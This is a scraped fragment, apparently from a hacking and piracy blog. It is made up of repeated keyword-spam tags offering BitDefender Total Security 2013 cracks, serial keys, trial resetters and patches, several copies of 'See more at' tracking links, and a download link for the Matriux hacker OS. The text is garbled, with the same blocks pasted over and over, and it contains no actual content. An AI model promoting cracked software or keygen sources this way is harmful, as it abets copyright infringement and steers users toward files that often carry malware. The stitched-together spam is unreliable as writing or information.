    Tags:  bit defender 2013 keys,bit defender total security activator,bit defender total security keys upto 2045,bit defender trial resetter,bit defender total security full version with keys,bit defender total security 2013 with permanent activator,bit defender crack for free,no surveys free download bit defender total security latest keys,daily updated bit defender keys,mediafire download link for full version bit defender keys,hack bit defender total security trial,total security crack,patch for bit defender,new hacking tricks for bit defender,bit defender blog
     bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
    bitdefender total security 2013 free download, bitdefender total security 2013 free download full version with crack, bitdefender total security 2013 free download for windows 7, bitdefender total security 2013 free download with crack, bitdefender total security 2013 free download full version with key, bitdefender total security 2013 serial key, bitdefender total security 2013 serial key free, bitdefender total security 2013,Serial cracks,Hacks,New hacking tricks,Antivirus cracks,total security crack.. - See more at: http://www.darkhtu.net/2013/07/bitdefender-total-security-working-keys.html#sthash.Oiz2sACP.dpuf
    Below To download
    http://www.matriux.com/index.php?page=download
    - See more at: http://www.darkhtu.net/2013/10/matriux-leandros-advanced-hacker-os.html#sthash.su8wJL3y.dpuf
    Below To download
    http://www.matriux.com/index.php?page=download
    - See more at: http://www.darkhtu.net/2013/10/matriux-leandros-advanced-hacker-os.html#sthash.su8wJL3y.dpuf
    http://www.matriux.com/index.php?page=download


    Also Check this Video........ - See more at: http://www.darkhtu.net/2013/10/matriux-leandros-advanced-hacker-os.html#sthash.su8wJL3y.dpuf
    http://www.matriux.com/index.php?page=download


    Also Check this Video........ - See more at: http://www.darkhtu.net/2013/10/matriux-leandros-advanced-hacker-os.html#sthash.su8wJL3y.dpuf